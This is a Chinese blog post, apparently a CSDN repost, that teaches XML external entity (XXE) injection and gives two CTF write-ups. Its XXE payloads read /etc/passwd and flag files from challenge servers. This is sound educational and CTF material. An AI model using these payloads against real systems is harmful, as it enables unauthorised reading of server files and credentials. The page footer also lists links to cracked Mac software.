XML外部实体注入(XEE)的原理和应用

最新推荐文章于 2024-03-19 12:00:00 发布
最新推荐文章于 2024-03-19 12:00:00 发布
阅读量2k 收藏
点赞数
分类专栏: Burp_suite 文章标签: web安全 安全 xml
原文链接:https://blog.csdn.net/iczfy585/article/details/108269451
版权

文章目录
XXE注入
一、XML简介
二、XML实体
三、CTF中XEE攻击
XXE注入
XXE注入全称是xml external entity 注入,也就是xml外部实体注入。XXE漏洞发生在应用程序解析输入的XML时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取,命令执行等攻击。

一、XML简介
XML是一种用户自定义的标记语言,主要用于数据的存储和传输。XML文档有自己的一个格式规范。是由DTD(document type define)来控制的。例如:

<?xml version="1.0"?> <!--XML文档定义-->
<!DOCTYPE message [ <!--定义该文档为message类型-->
<!ELEMENT message(username,password)<!-- 定义message有两个元素-->
<!ELEMENT username(#PCDATA)> <!-- 定义username元素为#PCDATA类型 -->
<!ELEMENT password(#PCDATA)>
]>
1
2
3
4
5
6
上面的DTD就定义了XML的根元素为message,然后根元素下面有一些子元素,后面的XML就要像如下的方式来书写。

<message>
    <username>root</username>
    <password>123</password>
</message>
1
2
3
4
二、XML实体
上面的<!ELEMENT>中定义的是元素,也就是定义了对应XML中的标签。还可以在DTD中定义XML实体。XML实体可以看作一个变量,到时候可以在XML中通过&符号来引用。

XML可分为外部实体和内部实体。首先来看内部实体:
示例:

<? xml version="1.0"?>
<!DOCTYPE message [
<!ELEMENT message ANY>
<!ENTITY tst "test">
]>
1
2
3
4
5
其中元素定义的ANY说明接受任何元素,同时定义了一个xml实体(<! ENTITY>标签),这样就可以在XML文档中这样来写

<message>
<user>&tst;</user>
</message>
1
2
3
外部实体
示例:

<?xml version="1.0"?>
<!DOCTYPE message [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<message>
    <user>&xxe;</user>
</message>
1
2
3
4
5
6
7
这里用 &实体名; 引用实体,在DTD中定义,在XML文档中引用。

通过上面的总结我们知道可以将实体分为外部实体和内部实体。但是实际上从另一个角度来开,还可以分为通用实体和参数实体。

1.通用实体:

用 &实体名; 引用的实体,他在DTD 中定义,在 XML 文档中引用

示例:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE Profile [<!ENTITY file SYSTEM "file:///etc/passwd">]
<Profile>
 <msg>&file;</msg>
</Profile>
1
2
3
4
5
2.参数实体

(1)使用 % 实体名(这里面空格不能少) 在 DTD 中定义,并且只能在 DTD 中使用 %实体名; 引用
(2)只有在 DTD 文件中,参数实体的声明才能引用其他实体
(3)和通用实体一样,参数实体也可以外部引用

示例:

<!ENTITY % an-element "<!ELEMENT mytag (subtag)>"> 
<!ENTITY % remote-dtd SYSTEM "http://somewhere.example.org/remote.dtd"> 
%an-element; %remote-dtd;
1
2
3
三、CTF中XEE攻击
1.题目地址:Jarvis http://web.jarvisoj.com:32794/

打开链接,输入数据后抓包:


发现传的是JSON数据,考虑修改一下上传文件类型为XML类型。构造外部实体,实现XXE攻击。将ContentType字段改为:application/xml,然后在请求内容中加上如下的payload:

<?xml version="1.0" ?>
<!DOCTYPE message [
<!ENTITY shell SYSTEM "file///etc/passwd">
]>
<message>&shell;</message>
1
2
3
4
5

发现了/home/ctf路径。改一下file的路径:file:///home/ctf/flag.txt。即可得到flag


2.题目地址:https://buuoj.cn/challenges (Fake XML cookbook)

抓包后,发现上传的是XML类型的数据

直接构造XML外部实体,读flag。payload如下:

<?xml version="1.0"?>
<!DOCTYPE user[
<!ENTITY admin SYSTEM "file:///flag">
]>
<user><username>&admin;</username><password>passwd</password></user>
1
2
3
4
5


参考文章
https://xz.aliyun.com/t/3357
https://www.freebuf.com/vuls/175451.html
————————————————
版权声明:本文为CSDN博主「izwqing」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/iczfy585/article/details/108269451

QQ934072160
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全】XXE--XML外部实体注入
边缘拼命划水的小陈
04-24 1004
XML外部实体注入XML EXTERNAL ENTITY)简称XXE漏洞,概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题"也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入
XXE外部实体注入
人若有志,就不会在半坡停止。
11-07 577
DTD全称是The document typedefinition,即是文档类型定义,可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。DTD 可被成行地声明于XML 文档中,也可作为一个外部引用。XXE(xml external entity injection)即xml外部实体注入漏洞。XXE是针对应用程序解析XML输入类型的攻击。也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入
【burpsuite安全练兵场-服务端10】XML外部实体注入(XXE注入)-9个实验(全)
最新发布
m0_59598029的博客
03-19 876
blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章)。!blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等。!
java --XXE 攻击原理及防御
tryheart的博客
09-05 1897
什么是 XEE XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一个注入漏洞,注入的是什么?XML外部实体。需要强调的是利用点是 外部实体 ,也是提醒读者将注意力集中于外部实体中,而不要被 XML 中其他的一些名字相似的东西扰乱了思维(盯好外部实体就行了),如果能注入 外部实体并且成功解析的话,这就会大大拓宽我们 XML 注入的攻击面。 XEE 背景 XML是一种非常流行的标记语言,在1990年代后期首次标准化,并被无数的软件项目所采
XEE详解
m0_52051132的博客
12-15 1368
XML外部实体注入 XML External Entity Injection如果Web应用的脚本代码没有限制XML引入外部实体,从而导致用户可以插入一个外部实体,并且其中的内容会被服务器端执行,插入的代码可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害 #而http : //mark4z5.com/evil.dtd内容为
(十二)XML外部实体(XXE)注入
weixin_43047908的博客
04-16 1741
目录一、什么是XML外部实体注入?二、XXE漏洞如何产生?什么是XML?什么是XML实体?什么是文件类型定义(DTD)?什么是XML自定义实体?什么是XML外部实体?三、XXE攻击有哪些类型?利用XXE检索文件利用XXE执行SSRF攻击四、寻找用于XXE注入的隐藏攻击面XInclude攻击通过文件上传进行XXE攻击通过修改的内容类型进行XXE攻击五、如何预防XXE漏洞 一、什么是XML外部实体注入XML外部实体注入(也称为XXE)是一个Web安全漏洞,它使攻击者能够干扰应用程序对XML数据的处理。它通
mac xee 3.5.3 kantu
03-15
自己收藏,解压使用,mac下的看图软件,密码xclient.info
Xee - Mac 图片查看器 破解版
07-02
Mac 图片查看软件,破解版
苹果操作系统图片查看工具XEE 2.2
05-06
苹果操作系统图片查看工具XEE 2.2,简单实用不带注册,纯绿色。
Xee for Mac 【3.5.3 TNT】
11-29
Mac专用的图片管理工具,十分好用,已亲测可以使用,TNT正版。
【最新版】Xee-45.zip【亲测可用】最好的macOS的图像查看器
05-06
Xee是一种简化且便捷的图像查看器和浏览器。它与macOS的Preview.app类似,但可让您轻松浏览文件夹和档案的全部内容,快速移动和复制图像文件,并支持更多图像格式。 无需解压缩,即可更快,更轻松地查看存档和文件夹...
xxe漏洞专题
goddemon
12-19 951
XML基础 xml作用:用于标记用户的数据与标记数据类型 定义以及基本结构 两种声明方法 **内部声明DTD** <!DOCTYPE 根元素 [元素声明]> **引用外部DTD** <!DOCTYPE 根元素 SYSTEM "文件名"> #实例 <?xml version="1.0"?> <!DOCTYPE note[ <!--定义此文档是 note 类型的文档-->
网络安全-XXE(XML外部实体注入原理、攻击及防御
关注网络安全、云原生安全
09-07 4257
目录 前言 简介 原理 攻击 防御 禁用外部实体 过滤用户提交的XML数据 前言 XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 博主之前用xml也没有使用过DTD,因为是可选的嘛,这里就简单说一下,学过的跳过。 DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。DTD 可以在 XML 文档内声明,也可以外部引用。 内部声明DTD <!DOCTYPE 根元素 [元素声明]>引用外部DTD文档 <!DOCTYPE 根元素 SYSTE
XXE漏洞
热门推荐
chaojixiaojingang
08-31 1万+
XXE漏洞概念:        XXE (XML External Entity injection)XML 外部实体注入漏洞,如果XML 文件在引用外部实体时候,可以沟通构造恶意内容,可以导致读取任意文件,命令执行和对内网的攻击,这就是XXE漏洞,这个漏洞需要大家还有一定的XML协议基础,因此为了更好的去理解漏洞本身原理,必须给大家介绍一下XML相关的知识点。 (1)XML概念:     ...
XXE漏洞原理、演示与防御
dl71181的博客
03-20 1016
目录: 前言 漏洞原理 Demo演示 如何发现XXE漏洞 XXE其他危害 案例-微信支付的XXE 修复建议 前言: 什么是XXE漏洞? XXE全称是——XML External Entity 简单来说,XXE就是XML外部实体注入。当应用程序允许引用外部实体时,通过构造恶意内容,就可以导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危...
XXE xml实体注入
4ct10n
11-03 6413
1.科普ENTITY 实体 在一个甚至多个XML文档中频繁使用某一条数据,我们可以预先定义一个这条数据的“别名”,即一个ENTITY,然后在这些文档中需要该数据的地方调用它。 XML定义了两种类型的ENTITY,一种在XML文档中使用,另一种作为参数在DTD文件中使用。 ENTITY的定义语法: <!DOCTYPE 文件名 [ <!ENTITY 实体名 "实体内容">
XEE漏洞浅谈
weixin_43460822的博客
09-18 1521
介绍XXE漏洞 XML外部实体注入XML External Entity)简称XXE漏洞。 什么是 XMLXML 指可扩展标记语言(EXtensible Markup Language)。 XML 是一种很像HTML的标记语言。 XML 的设计宗旨是传输数据,而不是显示数据。 XML 标签没有被预定义。您需要自行定义标签。 XML 被设计为具有自我描述性。 XML 是 W3C 的推荐标准。 ...
Shopware 5.3.3 XEE漏洞复现
heySister
12-11 1281
环境搭建 使用了php7.0版本、Mysql 5.5版本、Apache2 在安装过程中还挺烦的,因为各种扩展没有弄好…emmm…可能因为我没有好好看readme吧。 安装php7.0-curl curl php7.0-mysql php7.0-xml 在php.ini 中开启curl | mysql | pdo-mysql | xml扩展 反正就是提示什么错误,就对应去找就好了。 以后搭环境就...
XXE攻击
极客
07-23 2423
XXE注入攻击: 一、概念:XML External Entity(XXE)即XML外部实体攻击;造成服务器上敏感数据泄露(任意文件读取)、执行系统命令、潜在的DOS攻击、探测内网端口等; 1、什么是XMLXML用于标记电子文件使其具有结构性的标记语言;它被设计用来传输和存储数据,XML使用元素和属性来描述数据,在数据传送过程中,XML始终保留了诸如父/子关系这样的数据结构,不同应用程序可以共享和解析同一个XML文件; 2、XML格式: 它可以用来标记数据、定义数据...
pikachu xee漏洞
07-28
- *1* *2* *3* [Pikachu之XXE(xml外部实体注入漏洞)](https://blog.csdn.net/weixin_46145025/article/details/117297147)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值